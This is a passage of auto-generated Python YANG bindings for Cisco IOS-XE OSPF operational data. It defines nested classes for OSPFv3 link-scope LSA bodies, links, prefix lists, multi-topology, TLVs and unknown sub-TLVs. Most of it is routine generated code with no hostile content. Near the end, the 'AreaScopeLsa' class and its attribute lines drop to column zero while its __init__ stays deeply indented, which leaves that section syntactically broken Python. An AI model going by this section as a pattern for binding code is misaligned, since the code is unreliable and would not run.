                                self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
                                self._leafs = OrderedDict([
                                    ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
                                    ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
                                ])
                                # Bits-typed leaves get empty Bits containers rather than None.
                                self.lsa_flag_options = Bits()
                                self.lsa_body_flags = Bits()
                                self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
                                self.network.parent = self
                                self._children_name_map["network"] = "network"
                                self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
                                self.prefix.parent = self
                                self._children_name_map["prefix"] = "prefix"
                                self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
                                self.ia_router.parent = self
                                self._children_name_map["ia_router"] = "ia-router"
                                self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
                                self.lsa_external.parent = self
                                self._children_name_map["lsa_external"] = "lsa-external"
                                self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
                                self.nssa.parent = self
                                self._children_name_map["nssa"] = "nssa"
                                self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
                                self.link_data.parent = self
                                self._children_name_map["link_data"] = "link-data"
                                self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
                                self.ia_prefix.parent = self
                                self._children_name_map["ia_prefix"] = "ia-prefix"
                                self._segment_path = lambda: "lsa-body"
                                self._is_frozen = True
                            def __setattr__(self, name, value):
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
                            class Network(Entity):
                                """Generated binding for YANG container 'network' under 'lsa-body': attached-router leaf-list and network options bits."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()
                                    self.yang_name = "network"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                                        ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
                                    ])
                                    # leaf-list of router IDs.
                                    self.attached_router = []
                                    self.lsa_net_options = Bits()
                                    self._segment_path = lambda: "network"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
                            class Prefix(Entity):
                                """Generated binding for YANG container 'prefix' under 'lsa-body': inter-area-prefix LSA metric, prefix, and prefix options."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()
                                    self.yang_name = "prefix"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                        ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
                                        ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
                                    ])
                                    self.metric = None
                                    self.ia_prefix = None
                                    self.ia_prefix_options = None
                                    self._segment_path = lambda: "prefix"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
                            class IaRouter(Entity):
                                """Generated binding for YANG container 'ia-router' under 'lsa-body': inter-area-router LSA metric, destination router ID, and options bits."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()
                                    self.yang_name = "ia-router"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                        ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
                                        ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
                                    ])
                                    self.metric = None
                                    self.destination_router_id = None
                                    # Bits-typed leaf gets an empty Bits container rather than None.
                                    self.lsa_ia_options = Bits()
                                    self._segment_path = lambda: "ia-router"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
                            class LsaExternal(Entity):
                                """
                                YANG 'lsa-external' container under 'lsa-body': AS-external
                                LSA information of an OSPFv3 link-scope LSA.

                                Leafs: metric, referenced-ls-type, external-prefix,
                                external-prefix-options, forwarding-address (IPv4/IPv6
                                union — hence the ['str','str'] type list),
                                external-route-tag, referenced-link-state-id.
                                Child container: 'flags'.

                                Auto-generated YANG binding class; do not edit by hand.
                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()
                                    self.yang_name = "lsa-external"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
                                    self._leafs = OrderedDict([
                                        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                        ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                                        ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                                        ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                                        ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                                        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                    ])
                                    self.metric = None
                                    self.referenced_ls_type = None
                                    self.external_prefix = None
                                    self.external_prefix_options = None
                                    self.forwarding_address = None
                                    self.external_route_tag = None
                                    self.referenced_link_state_id = None
                                    # Child container is instantiated eagerly and parented here.
                                    self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
                                    self.flags.parent = self
                                    self._children_name_map["flags"] = "flags"
                                    self._segment_path = lambda: "lsa-external"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Validate attribute writes against the declared leaf names."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
                                class Flags(Entity):
                                    """
                                    YANG 'flags' container of 'lsa-external'.
                                    Single leaf: e-flag (boolean).
                                    """
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()
                                        self.yang_name = "flags"
                                        self.yang_parent_name = "lsa-external"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []
                                        self._child_classes = OrderedDict([])
                                        self._leafs = OrderedDict([
                                            ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                                        ])
                                        self.e_flag = None
                                        self._segment_path = lambda: "flags"
                                        self._is_frozen = True
                                    def __setattr__(self, name, value):
                                        """Validate attribute writes against the declared leaf names."""
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
                            class Nssa(Entity):
                                """
                                YANG 'nssa' container under 'lsa-body': NSSA LSA data of an
                                OSPFv3 link-scope LSA.  No leafs of its own; single child
                                container 'lsa-nssa-external'.

                                Auto-generated YANG binding class; do not edit by hand.
                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()
                                    self.yang_name = "nssa"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
                                    self._leafs = OrderedDict()
                                    self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
                                    self.lsa_nssa_external.parent = self
                                    self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
                                    self._segment_path = lambda: "nssa"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Validate attribute writes (no leafs declared on this node)."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)
                                class LsaNssaExternal(Entity):
                                    """
                                    YANG 'lsa-nssa-external' container of 'nssa'.  Mirrors the
                                    'lsa-external' leaf set: metric, referenced-ls-type,
                                    external-prefix(-options), forwarding-address (IPv4/IPv6
                                    union), external-route-tag, referenced-link-state-id, plus
                                    a 'flags' child container.
                                    """
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()
                                        self.yang_name = "lsa-nssa-external"
                                        self.yang_parent_name = "nssa"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []
                                        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
                                        self._leafs = OrderedDict([
                                            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                                            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                                            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                                            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                                            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                        ])
                                        self.metric = None
                                        self.referenced_ls_type = None
                                        self.external_prefix = None
                                        self.external_prefix_options = None
                                        self.forwarding_address = None
                                        self.external_route_tag = None
                                        self.referenced_link_state_id = None
                                        self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
                                        self.flags.parent = self
                                        self._children_name_map["flags"] = "flags"
                                        self._segment_path = lambda: "lsa-nssa-external"
                                        self._is_frozen = True
                                    def __setattr__(self, name, value):
                                        """Validate attribute writes against the declared leaf names."""
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
                                    class Flags(Entity):
                                        """
                                        YANG 'flags' container of 'lsa-nssa-external'.
                                        Single leaf: e-flag (boolean).
                                        """
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
                                            self.yang_name = "flags"
                                            self.yang_parent_name = "lsa-nssa-external"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                                            ])
                                            self.e_flag = None
                                            self._segment_path = lambda: "flags"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            """Validate attribute writes against the declared leaf names."""
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
                            class LinkData(Entity):
                                """
                                YANG 'link-data' container under 'lsa-body': link LSA data
                                of an OSPFv3 link-scope LSA.

                                Leafs: rtr-priority (uint8), link-local-interface-address
                                (IPv4/IPv6 union), num-of-prefixes (uint32),
                                lsa-id-options (bits).

                                Auto-generated YANG binding class; do not edit by hand.
                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()
                                    self.yang_name = "link-data"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
                                        ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
                                        ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
                                        ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
                                    ])
                                    self.rtr_priority = None
                                    self.link_local_interface_address = None
                                    self.num_of_prefixes = None
                                    # Bits-typed leaf gets an empty Bits container, not None.
                                    self.lsa_id_options = Bits()
                                    self._segment_path = lambda: "link-data"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Validate attribute writes against the declared leaf names."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
                            class IaPrefix(Entity):
                                """
                                YANG 'ia-prefix' container under 'lsa-body': intra-area
                                prefix LSA reference data of an OSPFv3 link-scope LSA.

                                Leafs: referenced-ls-type (uint16),
                                referenced-link-state-id (uint32), referenced-adv-router
                                (IPv4/IPv6 union), num-of-prefixes (uint16).

                                Auto-generated YANG binding class; do not edit by hand.
                                """
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()
                                    self.yang_name = "ia-prefix"
                                    self.yang_parent_name = "lsa-body"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                        ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
                                        ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
                                    ])
                                    self.referenced_ls_type = None
                                    self.referenced_link_state_id = None
                                    self.referenced_adv_router = None
                                    self.num_of_prefixes = None
                                    self._segment_path = lambda: "ia-prefix"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Validate attribute writes against the declared leaf names."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
                    class Ospfv3Link(Entity):
                        """
                        YANG list 'ospfv3-link' under 'link-scope-lsa': one OSPFv3
                        link entry, keyed by (interface-id, neighbor-interface-id,
                        neighbor-router-id).

                        Non-key leafs: type (uint8), metric (uint16).

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()
                            self.yang_name = "ospfv3-link"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
                                ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
                                ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
                                ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                            ])
                            self.interface_id = None
                            self.neighbor_interface_id = None
                            self.neighbor_router_id = None
                            self.type = None
                            self.metric = None
                            # Segment path embeds the current key values at evaluation time.
                            self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes against the declared leaf names."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
                    class Ospfv3PrefixList(Entity):
                        """
                        YANG list 'ospfv3-prefix-list' under 'link-scope-lsa',
                        keyed by 'prefix'.  Non-key leaf: prefix-options (string).

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()
                            self.yang_name = "ospfv3-prefix-list"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['prefix']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                            ])
                            self.prefix = None
                            self.prefix_options = None
                            self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes against the declared leaf names."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value)
                    class Ospfv3IaPrefix(Entity):
                        """
                        YANG list 'ospfv3-ia-prefix' under 'link-scope-lsa',
                        keyed by 'prefix'.  Non-key leaf: prefix-options (string).

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()
                            self.yang_name = "ospfv3-ia-prefix"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['prefix']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                            ])
                            self.prefix = None
                            self.prefix_options = None
                            self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes against the declared leaf names."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
                    class MultiTopology(Entity):
                        """
                        YANG list 'multi-topology' under 'link-scope-lsa',
                        keyed by 'name' (string); no other leafs.

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()
                            self.yang_name = "multi-topology"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['name']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('name', (YLeaf(YType.str, 'name'), ['str'])),
                            ])
                            self.name = None
                            self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes against the declared leaf names."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value)
                    class Tlv(Entity):
                        """
                        YANG 'tlv' container under 'link-scope-lsa': traffic-engineering
                        style link TLV data.

                        Leafs: link-type (uint8), link-id (uint32),
                        local-if-ipv4-addr / local-remote-ipv4-addr (leaf-lists,
                        IPv4/IPv6 union), te-metric (uint32), max-bandwidth /
                        max-reservable-bandwidth / unreserved-bandwidth (decimal64),
                        admin-group (uint32).

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()
                            self.yang_name = "tlv"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
                                ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                                ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
                                ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
                                ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
                                ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
                                ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
                                ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
                                ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
                            ])
                            self.link_type = None
                            self.link_id = None
                            # Leaf-lists default to empty Python lists.
                            self.local_if_ipv4_addr = []
                            self.local_remote_ipv4_addr = []
                            self.te_metric = None
                            self.max_bandwidth = None
                            self.max_reservable_bandwidth = None
                            self.unreserved_bandwidth = None
                            self.admin_group = None
                            self._segment_path = lambda: "tlv"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes against the declared leaf names."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value)
                    class UnknownSubTlv(Entity):
                        """
                        YANG list 'unknown-sub-tlv' under 'link-scope-lsa', keyed by
                        'type' (uint16).  Carries the raw bytes of an unrecognized
                        sub-TLV: length (uint16) and value (leaf-list of uint8).

                        Auto-generated YANG binding class; do not edit by hand.
                        """
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()
                            self.yang_name = "unknown-sub-tlv"
                            self.yang_parent_name = "link-scope-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['type']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
                            ])
                            self.type = None
                            self.length = None
                            # Leaf-list of raw octets; defaults to an empty list.
                            self.value = []
                            self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            """Validate attribute writes against the declared leaf names."""
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value)
class AreaScopeLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
                    def __init__(self):
                        """
                        Build the 'area-scope-lsa' list node (keys: lsa-type,
                        adv-router): register child classes, declare leafs
                        (decoded-completed, raw-data), instantiate the singleton
                        ospfv2-lsa / ospfv3-lsa children, and create empty YLists
                        for the repeated children.
                        """
                        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, self).__init__()
                        self.yang_name = "area-scope-lsa"
                        self.yang_parent_name = "link-scope-lsas"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = ['lsa_type','adv_router']
